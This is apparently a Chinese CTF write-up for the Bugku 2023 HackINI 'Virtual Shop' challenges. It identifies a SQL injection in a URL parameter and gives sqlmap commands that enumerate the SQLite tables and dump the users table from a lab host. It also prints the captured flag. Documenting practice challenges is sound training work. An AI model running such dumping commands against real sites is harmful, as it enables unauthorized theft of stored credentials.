Bugku 2023 HackINI Virtual Shop 和 2023 HackINI Virtual Shop 2

目录

前置知识

解题过程

[Virtual Shop](#Virtual Shop)

[Virtual Shop 2](#Virtual Shop 2)

总结


前置知识

网络安全-SQL注入-CSDN博客

解题过程

Virtual Shop

打开靶场

可以看到URL有参数传输,再根据题目描述了数据库相关内容,可以确定为SQL注入

练习一下SQLMAP工具

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport

可以看到存在多种注入方式,并且数据库类型为SQLite,该数据库是轻量级数据库,没有数据库名。直接查询有哪些表

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport --tables

结合题目描述,flag应该是再users中admin的密码那里,直接dump表users的全部数据即可

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport -T users --dump

成功获取flag

复制代码
shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

Virtual Shop 2

步骤与Virtual Shop相同,sqlmap注入前清除下缓存,要不然扫的是Virtual Shop的结果

复制代码
python sqlmap.py --purge

总结

一道基础的sql注入的题,可以手工注入练习,也可以直接sqlmap梭哈

相关推荐
pps-key1 小时前
网络安全教学体系构建与实施方案
安全·web安全
蓝之白1 小时前
Vulnhub_DC-8
web安全·ctf·网络攻防·靶场渗透
蓝之白1 小时前
流量分析_SnakeBackdoor-2
web安全·ctf·流量分析
江边鸟2191 小时前
小迪安全第二十六天
网络·tcp/ip·安全·web安全·网络安全
代码游侠2 小时前
复习——SQLite3 数据库
linux·服务器·数据库·笔记·网络协议·sqlite
Neolnfra12 小时前
攻防实战:数据窃取技术详解
web安全·网络安全·数据安全
m0_4772031014 小时前
Hercules-HTB-writeUp
web安全·网络安全
代码游侠18 小时前
复习—sqlite基础
linux·网络·数据库·学习·sqlite
合才科技18 小时前
【要闻周报】网络安全与数据合规 12-31
安全·web安全
Par@ish19 小时前
【网络安全】Apache StreamPipes 严重漏洞使攻击者可夺取管理员控制权
安全·web安全·apache